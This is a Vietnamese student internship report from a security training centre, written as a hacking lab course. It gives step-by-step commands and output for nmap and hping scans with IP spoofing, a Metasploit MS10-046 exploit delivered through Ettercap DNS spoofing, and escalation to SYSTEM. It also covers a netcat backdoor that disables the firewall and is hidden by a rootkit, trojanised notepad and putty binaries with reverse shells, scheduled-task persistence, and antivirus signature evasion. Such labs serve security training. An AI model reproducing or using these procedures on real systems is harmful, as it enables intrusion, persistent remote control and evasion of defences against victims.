bao cao thuc tap athena tuan 1 2-3

Đề Tài Thực Tập

SYSTEM HACKING

Người Hướng Dẫn: Thầy Võ Đỗ Thắng

Người Thực Hiện Đề Tài: PHẠM HOÀNG HẢI

MỤC LỤC

I – Giới Thiệu

1.0 Giới thiệu về ATHENA……………………………31.1 Giới thiệu về System Hacking………………..........7

II – Nội Dung Thực Tập Tại ATHENA

2.0 Hướng dẫn cài VMware và BackTrack 5r3………...8

2.1 SCANNING……………………………………….25

2.2 SYSTEM HACKING……………………………...64

2.3 TROJAN…………………………………………...89

GIỚI THIỆU

1.0 – Giới Thiệu Về ATHENA

Lịch sử:

Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà .

Lĩnh Vực Hoạt Hộng Chính:

+ Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính,…..

+ Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,.....

+ Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......

Đội Ngũ Giảng Viên:

+Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA

+Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA

1.1 – Giới Thiệu Về System Hacking

Hiện nay, rất nhiều người sử dụng máy tính hệ điều hành Windows như WIN XP, WIN 7 và các ứng dụng văn phòng như Microsoft Office 2003,2007,… cho công việc hang ngày.

Tuy nhiên những hệ điều hành trên và các ứng dụng Microsoft Office đó sẽ có những lỗ hổng bảo mật.

Và các hacker sẽ lợi dụng điều đó để xâm nhập trái phép vào máy nạn nhân để đánh cắp thông tin cũng như phá hoại.

Đề tài System Hacking này sẽ giúp các bạn hiểu được cách hacker xâm nhập và khai thác các lỗ hổng trên như thế nào.

Và làm sao có thể khắc phục được các lỗ hổng và bảo vệ được máy của mình nếu như có xâm nhập trái phép xảy ra.

NỘI DUNG THỰC TẬP

2.0 – Hướng dẫn cài VMware và BackTrack 5r3

Cài VMware:

Bước 1: Các bạn download phần mềm VMware worksations trên mạng về và cài đặt như bình thường.

Bước 2: Thiết lập CẤU HÌNH MÁY ẢO cho phần mềm:

Chọn Create a new virtual Machine:

Chọn Next, rồi chọn i will install the operating system later

Chọn Next, chọn HDH mà bạn muốn cài, ở đây mình chọn WINXP

Chọn Next > chọn Browse để lưu file ( chọn ổ nào trống tầm 10G là đẹp ko nhất thiết là ổ đĩa C )

Nhấn Next chọn dung lượng ổ cứng (cái này tùy mọi người chọn nhé )

Chọn Next > chọn custumize hardware, mục này nhiều cái hay lắm

Xong rùi chọn Close rồi chọn Finish là xong!

Bước 3: CÀI HỆ ĐIỀU HÀNH CHO MÁY ẢO

Cài trực tiếp từ đĩa winxp.iso,vào menu VM chọn settings chọn CD/DVD chọn đường dẫn là đĩa winxp.iso cần cài:

Chọn OK rùi chọn nút màu xanh như hình dưới chọn power on để cài Win.

Quá trình cài windows y chang cài trên máy thật thế là xong

Cài BackTrack 5r3:

Nhập vào đoạn text sau để chuyển sang giao diện đồ họa [startx]

Click chọn install trên desktop để tiếp tục cài đặt các thông số như ngày giờ, ổ đĩa và ngôn ngữ > Xong.Nếu muốn sử dụng lệnh thì có thể mở Terminal.Hình màu đen ở thanh trên cùng nhỏ nhỏ

SCANNING

Bài 1: Nmap Scanning

1. Mục Đích :

- PC attacker sử dụng hệ điều hành Back Track 5, trong đó đã được install mặc định chương trình nmap. Ngoài ra ta có thể download và cài đặt nmap có thể install trên Window và Linux.

- Mục đích bài lab: sử dụng Nmap để xác định các thông số hệ điều hành, port, dịch vụ tương ứng với…

- Nmap là một trong những network scanner rất hiệu quả. Thông qua nmap ta có thể thực hiện quá trình scan với các kỹ thuật khác nhau như SYN scan, TCP Connection scan, Xmas scan, Null scan…

2. C ác b ư ớ c t h ự c h i ệ n

- Ta có thể sử dụng nmap hỗ giao diện đồ họa và giao diện dòng lệnh. Giao diện dòng đồ họa sử dụng chương trình zendmap. Còn ở giao diện dòng lệnh thì ta sử dụng câu lệnh nmap.

- Bước 1: ta xem giúp đỡ của câu lệnh NMAP

- Bước 2: thực hiện quá trình ping sweep cho đường mạng 192.168.1.0/24 để xác định các host đang có trong đường mạng bằng câu lệnh “nmap -sP -v

172.16.34.1/24”

- Bước 3: Ta cần xác định xem ở IP 172.16.34.18 đang có nhưng port nào đang mở. Để làm việc này ta có thể sử dụng các dạng scan khác nhau. Ví dụ ở đây ta sử dụng kỹ thuật SYN scan với câu lệnh “nmap –sS 172.16.34.18”

- Bước 4: xác định giá trị port trong quá trình scan. Mặc định chương trình sẽ scan tất cả các port. Ví dụ ta cần xác định trong đường mạng 172.16.34.1/24 thì đang có bao nhiêu máy đang mở port 445,139,80,3389 ta có thể sử dụng câu lệnh “nmap -sT -p 445,139,3389 172.16.34.1/24”

- Bước 5: Sử dụng nmap scan đường mạng với IP Public bên ngoài với câu lệnh “nmap -sS -p 80 222.253.166.1/24 > /root/Desktop/scan_adsl.txt” . Như vậy kết quả scan sẽ được ghi thành file scan_adsl.txt

- Bước 6: Sử dụng nmap để xác định các thông số của các ứng dụng được triển khai trên server. Ta sử dụng “nmap -p 1-65535 -T4 -A -v 192.168.0.4”

- Bước 7: Trong nmap hỗ trợ sử dụng các scripts đển scan một lỗi ứng dụng nào đó. Đầu tiên ta có thể sử dụng câu lệnh “locate nmap” để xác định các file script đang được hỗ trợ trong nmap. Ví dụ ta có thể sử dụng kiểm tra lỗi ms08-067 của các máy trong đường mạng “nmap -sT --script smb-check-vulns.nse -p 139,445

172.16.34.1/24”

Ngoài ra ta có thể kiểm tra xem trong mạng có máy nào đang chuyển card mạng sang Promicious mode để sniffer traffic trên đường truyền “nmap --script sniffer- detect 172.16.34.1/24”

- Bước 8: Trong quá trình scan ta nên thay đổi các giá trị IP source, lưu lượng gói tin gửi trong thời gian 1 giây, thực hiện phân mảnh gói tin, giả thông số ttl. Ví dụ

ta thực hiện câu lệnh “nmap -sS -p 3389,445,139,23,22,80 --max-rate 50 -S

10.0.0.1 192.168.1.78 -ttl 128 -f -e eth0 -Pn”

-sS : SYN Scan

-p : port

--max-rate: luu luong maximum per second

-f: fragment

-S: Spoofing IP address

-e: xac dinh interface

-ttl: xac dinh gia tri ttl ( mac dinh window la 128 )

Bài 2: Scanning Nmap Thông Qua ProxyChains

1. M ụ c đ í c h b ài lab

- Sơ đồ bài lab như sau:

192.168.1.0/24


- Mục đích bài lab: ta cấu hình công cụ proxychain làm local proxy chương trình nmap. Proxy chain sẽ kết nối đến một Proxy Server ngoài mạng internet. Như vậy thì nmap sẽ scan victim server thông qua một proxy server.


- Bước 1: Install và Configure Proxychains. Nếu như máy linux ta chưa có install

Proxychains, ta thực thi câu lệnh bên dưới nhanld@nhanld-laptop:~$ sudo su [sudo] password for nhanld:

root@nhanld-laptop:/home/nhanld# apt-get install proxychains

Vị trí file cấu hình cho proxychains tại /etc/proxychains.conf

nhanld@nhanld-laptop:~$gedit /etc/proxychains.conf

Ta sẽ bỏ dấu # trước dòng strict_chain trong file cấu hình.

Tìm kiếm một số trang web cung cấp proxy server. Proxychains hỗ trợ các phương thức là HTTP Proxy, SOCK 4 và SOCK 5. Ta có thể dùng các từ khóa để tìm kiếm trên Google “free proxy server list” hoặc “free proxy server list sock”

- Cấu hình ProxyChains hỗ trợ các dạng Proxy. Ví dụ, ta sẽ thêm một số dòng vào file /etc/proxychains.conf

http 94.23.236.217 80 http 83.216.184.132 8080 sock5 203.206.173.4 1080 sock4

85.119.217.113 1080 sock4 201.55.119.43 1080

- Bước 2:Install Nmap từ Source. Ta có thể download source Nmap từ trang web http://nmap.org/download.html . Thực hiện quá trình install từ source, ta

chọn install vào đường dẫn là /opt/nmap

nhanld@nhanld-laptop:~$cd /home/nhanld/Download nhanld@nhanld-laptop:~$tar xvf nmap-5.51.tar.bz2 nhanld@nhanld-laptop:~$cd nmap-5.51 nhanld@nhanld-laptop:~$mkdir /opt/nmap

nhanld@nhanld-laptop:~/Downloads/nmap-5.51$ ./configure –

prefix=/opt/nmap

nhanld@nhanld-laptop:~/Downloads/nmap-5.51$ make nhanld@nhanld-laptop:~/Downloads/nmap-5.51$ sudo make install

- Bước 3: dùng Nmap scan thông qua Proxychains. Để thực hiện câu lệnh scan bằng tool nmap thông qua proxychains, ta nhập vào câu lệnh proxychains và tiếp theo là câu lệnh của Nmap

root@nhanld-laptop:/home/nhanld/Downloads/nmap-5.51# proxychains nmap -sS 27.0.12.130

ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-14 16:27 ICT Warning: File ./nmap-services exists, but Nmap is using

/opt/nmap/share/nmap/nmap-services for security and consistency

reasons. set NMAPDIR=. to give priority to files in your local directory

(may affect the other data files too).

Nmap scan report for mail.kaka.vn (27.0.12.130)

Host is up (0.11s latency). Not shown: 991 closed ports PORT STATE SERVICE

21/tcp open ftp

42/tcp filtered nameserver

80/tcp open http

111/tcp open rpcbind

135/tcp filtered msrpc

139/tcp filtered netbios-ssn

445/tcp filtered microsoft-ds

3306/tcp open mysql

8888/tcp open sun-answerbook

Bài 3: Nessus Scanning


- Nessus Client và Server ta có thể sử dụng trên cùng 1 PC hoặc trên 2 PC. Máy victim trong bài Lab sử dụng là máy Window

- Nessus là một trong những công cụ hỗ trợ admin scan các vulnerable của hệ

điều hành, các ứng dụng … khá tốt. Ngoài ra ta có thể sử dụng các công cụ khác như OpenVAS, GFI Languard


- Bước 1: Đầu tiên ta sẽ download và đăng ký Activation Code tại trang web h t tp: //w w w . t en a b le . c om/ p r o duc ts/ n essu s . Các thao tác cấu hình của Nessus sẽ được thực hiện trên nền giao diện web.

- Bước 2: Sau khi cài đặt xong, ta sử dụng trình duyệt web kết nối vào h t tp s:/ / l o c al h o s t : 8 8 34 để điều khiển Nessus

- Bước 3: Tiếp tục định nghĩa ra username và password

- Bước 4: Nhập vào Activation Code

- Bước 5: Sau đó chương trinh sẽ download về các Plugin để sử dụng scan

Bước 6: Cấu hình Nessus scan vulnerable của hệ điều hành và ứng dụng. Các bước chính ta cần cấu hình:

o Tạo Policy và chọn phương thức scan.

o Chọn đối tượng scan

o Kiểm tra kết quả và xuất report

Đầu tiên ta login vào Nessus bằng cách sử dụng đường link h t t p s:/ / l o c al h o s t : 8 8 34

Click vào Policies, click vào Add, định nghĩa ra một profile scan. Ở đây ta định

nghĩa ra profile có tên là Athena Scan.

Nhập vào username và password xác thực để scan (ta có thể scan được nhiều lỗi

hơn) hoặc ta không nhập username và password.

Chọn Windows: Microsoft Bullentins để scan các lỗi của hệ điều hành Window.

Thông tin database ta để mặc định.

- Bước 7: Tiếp tục ta Click vào SCANS , xác định Policy là Athena Scan, Scan

Target nhập vào IP 192.168.1.236 để cấu hình các đối tượng để scan.

- Bước 8: Cuối cùng ta xem kết quả scan và xuất report

Bài:Hping scanning


- Sơ đồ bài lab như sau:


- Mục đích bài lab: sử dụng Hping để xác định các thông số hệ điều hành, port, dịch vụ tương ứng với. Ngoài ra Hping cho phép ta tạo ra những gói tin theo ý mình và dễ dàng điều chỉnh lưu lượng


- Bước 1: Hping là một trong những công cụ scan tốt. Nó cho phép ta tạo ra các gói

tin theo ý muốn, điều chỉnh số lượng gói tin gửi … Mặc định hping2, hping3 được cài đặt mặc định trong Back Track 5. Ta có thể xem giúp đỡ bằng câu lệnh “hping3 --help”

- Bước 2: Sử dụng hping để gửi standard ICMP packet đến target. Bằng câu lệnh

“hping3 –icmp –c 4 athena.edu.vn”

- Bước 3: Tiếp theo ta sử dụng lại câu lệnh ở trên và thêm vào 2 biến

o –d kích thước data trong gói tin

o –V hiển thị thông tin đầy đủ

- Bước 4: Sử dụng biến –j để xem kết quả output dạng hexa decimal

- Bước 5: Sử dụng hping3 gửi SYN packet đến một host. Ta sẽ thêm biến –S và – p để xác định giá trị port 25. Trên màn hình ta sẽ nhận được 4 packet với “SA” flag. Với giá trị SYN/ACK trả về nghĩa là port này Open. Câu lệnh ta phải nhập vào là “hping3 –S –p 25 –c 4 athena.edu.vn ”

-

Bước 6: Attacker gửi ACK Probe với giá trị sequence number random. Nếu như không có packet response nghĩa là port được filter ( có stateful firewall). Nếu RST packet reponse nghĩa là port không có được filter (không có firewall) Ta có thể xác định thêm giá trị source port cho câu lệnh Ack Scan ở trên bằng biến

–s. Ví dụ ta sẽ nhập vào câu lệnh “hping3 –A –p 25 -s 5555 –c 4 athena.edu.vn”

- Bước 7: Ta có thể spoofing IP bằng biến –a. Ví dụ ta nhập vào câu lệnh như sau

“hping3 -S -p 80 -s 5555 -a 192.168.1.121 -c 10 192.168.1.254”

Nếu như ta sử dụng wireshark capture traffic thì sẽ thấy traffic giữa 2 IP

192.168.1.121 và IP 192.168.1.254

- Bước 8: Để scan cùng 1 lúc nhiều port thì ta sẽ sử dụng option --scan [port cần scan]. Ví dụ “hping3 –S –scan 80,443,25,85-90 –V athena.edu.vn”

2.2 System Hacking

I. M ụ c ti ê u bài l ab

- Mô hình bài lab

-

Mục đích bài lab: ta sẽ thử thực hiện tấn công vào 1 máy Window XP (victim), sau đó thực hiện upload Netcat Backdoor để điều khiển victim, tiếp tục ta sử dụng công cụ Rootkit để ẩn đi process của netcat

- Máy attacker sử dụng chương trình Metasploit đã được cài đặt sẵn.

I I . Các bư ớc t h ự c h i ệ n

1. Ch u ẩn b ị Me t asploit

- Ta sử dụng lỗi shortcut Ms10-046 để khai thác lỗi, ta sẽ thực hiện như sau:

root@bt:/pentest/exploits/framework3# msfconsole

msf >search lnk

msf >use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf >set payload windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) >set LHOST 192.168.1.10

LHOST => 192.168.1.10

msf exploit(ms10_046_shortcut_icon_dllloader) >set SRVHOST 192.168.1.10

msf exploit(ms10_046_shortcut_icon_dllloader) >exploit -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444

[*]

[*] Send vulnerable clients to \\192.168.1.10\EPzSUxdEj\.

[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk

[*]

[*] Using URL: http://192.168.1.10:80/

[*] Server started.

- Bây giờ làm sao để client connect vào server 192.168.1.0. Ta có thể chọn giải pháp là sử dụng DNS spoofing

2. C ấu h ình E t t e rc a p D N S Sp o of i ng

- Ta cấu hình file etter.dns (/usr/share/ettercap/etter.dns) với IP của trang www . g o o g le.com là IP của attacker 192.168.1.10 bằng cách thêm vào 2 dòng sau

www.google.com A 192.168.1.10

www.google.com PTR

192.168.1.10

- Thực hiện quá trình dns spoofing

Ettercap -T -q –M arp:remote –P dns_spoof –i eth0 /192.168.1.11/ //

- Tại máy client nhập vào trang web www . g o o gl e . c om và hiện ra màn hình giống

như bên dưới

3. Ki ể m tra me tas p l o it

- Metasploit trả ra cho ta các dòng log như bên dưới

msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Sending UNC redirect to

192.168.1.11:1655 ...

[*] Sending UNC redirect to 192.168.1.11:1655 ...

[*] Responding to WebDAV OPTIONS request from 192.168.1.11:1660

[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj

[*] Sending 301 for /EPzSUxdEj ...

[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/ [*] Sending directory multistatus for /EPzSUxdEj/ ...



[*] Received WebDAV PROPFIND request from 192.168.1.11:1660 /EPzSUxdEj/

[*] Sending directory multistatus for /EPzSUxdEj/ ...










[*] Received WebDAV PROPFIND request from 192.168.1.11:1663

/EPzSUxdEj/desktop.ini

[*] Sending 404 for /EPzSUxdEj/desktop.ini ... [*] Sending LNK file to 192.168.1.11:1663 ...


/EPzSUxdEj/vncuNN.dll.manifest

[*] Sending 404 for /EPzSUxdEj/vncuNN.dll.manifest ... [*] Sending DLL payload 192.168.1.11:1663 ...


/EPzSUxdEj/vncuNN.dll.123.Manifest

[*] Sending 404 for /EPzSUxdEj/vncuNN.dll.123.Manifest ... [*] Sending stage (752128 bytes) to 192.168.1.11

[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.11:1664) at

2011-07-20 10:22:16 +0700

msf exploit(ms10_046_shortcut_icon_dllloader) >sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------1 meterpreter x86/win32 NHANLD-XP\nhanld @ NHANLD-XP

192.168.1.10:4444 -> 192.168.1.11:1664

msf exploit(ms10_046_shortcut_icon_dllloader) >sessions -i 1

[*] Starting interaction with 1...

- Kiểm tra một số thông tin của máy victim và nâng quyền

meterpreter >getuid

Server username: NHANLD-XP\nhanld

meterpreter >getprivs

============================================================ Enabled Process Privileges

============================================================ SeDebugPrivilege

SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege

SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeManageVolumePrivilege

meterpreter >getsystem

...got system (via technique 1). meterpreter >getuid

Server username: NT AUTHORITY\SYSTEM

4. S ử D ụn g N e tc at làm b a c k d o o r và h xd e f100 r o otkit

- Ta chuẩn bi sẵn file nc.exe để upload. File này trong BT5 nằm tại vị trí

/pentest/windows-binaries/tools

meterpreter >pwd C:\DOCUME~1\nhanld\LOCALS~1\Temp meterpreter

>cd C:\\WINDOWS\\Help meterpreter >mkdir netcat

Creating directory: netcat meterpreter > cd netcat meterpreter >pwd C:\WINDOWS\Help\netcat

meterpreter >upload /pentest/windows-binaries/tools/nc.exe

[*] uploading : /pentest/windows-binaries/tools/nc.exe -> .

[*] uploaded : /pentest/windows-binaries/tools/nc.exe -> .\nc.exe

- Ta sẽ tạo ra một file nc_scripts.bat có nội dung đơn giản như sau

@echo off

netsh firewall set opmode disable nc.exe -l -v -p 4444 -e cmd.exe

- Tạo ra một file nc_scripts.vbs có nội dung như sau

Set WshShell = CreateObject("WScript.Shell")

WshShell.Run chr(34) & "C:\WINDOWS\Help\netcat\nc_scripts.bat" & Chr(34), 0

Set WshShell = Nothing

- Upload 2 file này vào máy victim

meterpreter >upload /root/Desktop/nc_scripts.bat .

[*] uploading : /root/Desktop/nc_scripts.bat -> .

[*] uploaded : /root/Desktop/nc_scripts.bat -> .\nc_scripts.bat meterpreter >upload /root/Desktop/nc_scripts.vbs .

[*] uploading : /root/Desktop/nc_scripts.vbs -> .

[*] uploaded : /root/Desktop/nc_scripts.vbs -> .\nc_scripts.vbs

- Ta sẽ sử dụng metasploit upload 2 file này folder vào C:\WINDOWS\Help

- Tiếp tục ta sẽ upload rootkit hxdef100: bao gồm một file cấu hình và một file thực thi

+ file cấu hình để ẩn process của chương trình nc.exe và file thực thi của

chương trình

meterpreter >upload /root/Desktop/hxdef100.ini .

[*] uploading : /root/Desktop/hxdef100.ini -> .

[*] uploaded : /root/Desktop/hxdef100.ini -> .\hxdef100.ini meterpreter >upload /root/Desktop/hxdef100.exe .

[*] uploading : /root/Desktop/hxdef100.exe -> .

[*] uploaded : /root/Desktop/hxdef100.exe -> .\hxdef100.exe

- Start netcat backdoor thông qua nc_scripts.vbs ( start 2 chương trình là nc.exe

và cmd.exe ) và rootkit meterpreter >shell Process 2868 created. Channel 28 created.

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\Help\netcat>start nc_scripts.vbs

start nc_scripts.vbs

- Kiểm tra port và các tiến trình đang hoạt động trong máy bằng lệnh netstat –

ano và tasklist thì ta thấy port và dịch vụ bất thường

- Khởi động rootkit để ẩn process nc.exe và ẩn đi file thực thi của chương trình

netcat

C:\WINDOWS\Help\netcat>start hxdef100.exe

start hxdef100.exe

- Ta kiểm tra lại process thì thấy tiến trình nc.exe đã được ẩn đi.

- Attacker sử dụng chương trình telnet hoặc chương trình netcat để connect

điều khiển máy attacker

root@bt:/opt/framework3/msf3# telnet 192.168.1.11 4444

Trying 192.168.1.11... Connected to 192.168.1.11. Escape character is '^]'.

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\Help\netcat> C:\WINDOWS\Help\netcat>

5. Tạo ra b a c k d o o r và up l o ad b ằ n g m e t asploit

- Ta chuẩn bị một file để ghép backdoor vào. Ví dụ ta sử dụng chương trình

notepad.exe

- Sử dụng câu lệnh sau để tạo ra backdoor

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4455 R |

./msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/NOTEPAD.EXE -

o /root/Desktop/backdoor_notepad.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)



- Trong metepreter ta có thể sử dụng câu lệnh run scheduleme để upload

backdoor và cho backdoor startup với hệ thống.

meterpreter >run scheduleme –h

Để hiển thị các giúp đỡ của câu lệnh

meterpreter >run scheduleme -e /root/Desktop/backdoor_notepad.exe -s

[*] Uploading /root/Desktop/backdoor_notepad.exe.... [*] /root/Desktop/backdoor_notepad.exe uploaded!

[*] Scheduling command C:\DOCUME~1\nhanld\LOCALS~1\Temp\svhost72.exe to run startup.....

[*] The scheduled task has been successfully created

[*] For cleanup run schtasks /delete /tn syscheck15 /F

- Lúc này backdoor notepad đã được kích hoạt, ta tiếp tục sử dụng tính năng

multi/handler để chờ đợi kết nối của victim

msf exploit(ms10_046_shortcut_icon_dllloader) >use exploit/multi/handler msf exploit(handler) >set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

msf exploit(handler) >set LHOST 192.168.1.10

msf exploit(handler) >set LPORT 4455

LPORT => 4455

msf exploit(handler) >exploit -j

[*] Exploit running as background job.

- Restart lại máy victim, lúc này kết nối mà ta đã sử dụng thông qua lỗi ms10-046

đã bị mất. Sau đó victim tự động tạo ra reverser connection đến máy victim.

msf exploit(handler) >

[*] Sending stage (752128 bytes) to 192.168.1.11

[*] Meterpreter session 3 opened (192.168.1.10:4455 -> 192.168.1.11:1025) at

2011-07-20 12:08:20 +0700

- Nếu như ta kiểm tra dịch vụ và các kết nối của máy client thì ta sẽ thấy điều bất

thường ở đây là một dịch vụ lạ xuất hiện

Tài liệu Học Hacker Mũ Trắng-AEH T iạ ATHENA.GV: Lê Đình Nhân


2.3 VIRUS TROJAN

Bài: By Pass Anti Virus

I. M ụ c đ í c h b ài lab

- Hầu hết các chương trình chống virus đều nhận dạng file là chương trình độc hại dựa trên signature database được update thường xuyên

- Các công cụ cần thiết cho bài lab. Các công cụ này ta cài đặt trong 1 máy

tínho Dsplit: được sử dụng để cắt các file thành nhiều phần với độ dài tăng

dần.o Hex Editor: để sử dụng phân tích chương trình và thay đổi các giá trị

trong fileo Chương trình scan virus để kiểm tra. Trong bài lab này ta sẽ sử dụng

chương trình Avasto 1 File được các chương AV cảnh báo. Trong bài lab ta sẽ sử dụng

chương trình “Ice Gold Freezer”o Các công cụ scan virus online ví dụ như trang web

www . vi r u s t otal . c om

II. C ác b ư ớ c t h ự c h i ệ n

- Ta thử scan file “Ice Gold Freezer” bằng trang web w w w . v i rus t otal . c om thì24/43 chương trình nhận dạng đây là Malware


- Copy source “Ice Gold Freezer” vào folder chứa source chương trình Dsplit ta thực hiện quá trình cắt file thành các đoạn và sử dụng Avast scan các file này. Thông qua quá trình này ta sẽ ước lượng được signature nhận virus sẽ nằm ở phần nào trong file.


- Ta sử dụng Avast scan tất cả các file đã được cắt ra và xác định file nào bắtđầu từ byte nào thì file bị nhận là Virus


- Theo kết quả màn hình ở trên thì từ byte thứ 102000 thì chương trìnhđược nhận là virus. Ta xóa hết các file đã được cắt nhỏ.

- Tiếp tục ta sẽ kiểm tra xem từ byte 101000 đến 102000 thì như thế nào ?Ta sử dụng khoảng tăng là 100 byte.

- Ta scan các file vừa được tạo ra bằng Avast một lần nữa

- Kết quả thu được là từ file 101900 đến 102000 được nhận là virus.

Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân


- Ta tiếp tục kiểm tra phân đoạn từ 101800 đến 101900 với khoảng tăng là10 byte và scan lại.


- Kết quả thu được là từ file 101820 sẽ được nhận là virus.

- Ta sẽ tiếp tục phân tích từ file 101810 đến 101820 với khoảng tăng là 1 byte như thế nào ?

- Đến đây thì ta đã xác định được byte 101819 được xác định là có virus


- Ta sẽ thay đổi giá trị 101819 thành một giá trị khác. Ở đây ta sẽ đánh thêm vào2 lần phím spacebar. Ta sẽ thấy xuất hiện thêm 2 giá trị hexa là 20 20 trên màn hình.


- Sau đó ta thử upload chương trình lên virustotal và kiểm tra kết quả scan tađược tỷ lệ 7/42 AV nhận đây là virus

Bài : Tạo Trojan bằng Metasploit

1. M ụ c đ í c h b ài lab - Mục đích bài lab: sử dụng công cụ msfpayload và msfencode có trong

Metasploit để tạo ra file Trojan. Ta chuẩn bị file thực thi exe nào đó. Ví dụ như ở đây ta sử dụng chương trình putty.exe

- Sử dụng msfpayload để tạo backdoor. Sau đó ta sử dụng msfencode để by pass anti virus

- Sơ đồ bài lab

234

Attacker

192.168.1.0/24 Victim

2. C ác b ư ớ c t h ự c h i ệ n - Đầu tiên ta copy file putty.exe vào trong máy backtrack 5. Ta thực hiện câu

lệnh bên dưới với giá trị LHOST là IP của attacker, LPORT là port mà máy attacker sử dụng để quản lý kết nối. “ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=4455 R |./msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/putty.exe -o/root/Desktop/putty_backdoor.exe “

- Sau khi tạo xong backdoor bước kế tiếp là làm sao gửi file backdoor này đến victim. Ví dụ ở đây ta start dịch vụ apache2 và copy file này vào trong folder/var/www

- Khởi động dịch vụ apache 2 và kiểm tra download file

- Sau khi ta đã chuẩn bị xong mọi thứ ta sử dụng tính năng “exploit/multi/handler” để quản lý các kết nối từ máy victim đến máy attacker.

msf >use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) >set LHOST

192.168.1.234

msf exploit(handler) >set LPORT 4455

LPORT => 4455

msf exploit(handler) >exploit –j

- Victim thực thi file putty_backdoor.exe thì tại máy attacker sẽ có được 1 kết nối điều khiển.

- Tiếp tục ta nhập vào câu lệnh “run post/windows/escalate/bypassuac” thìmetasploit sẽ tạo ra 1 sessions mới.

- Ta kết nối vào sessions số 5 bằng cách nhập vào câu lệnh “background” và“sessions –l” và “sessions –i 5”

- Thông qua kết nối mới ta nhập vào các câu lệnh getprivs, getsystem, getuid đểta có quyền system với máy victim.

bao cao thuc tap athena tuan 1 2-3

Education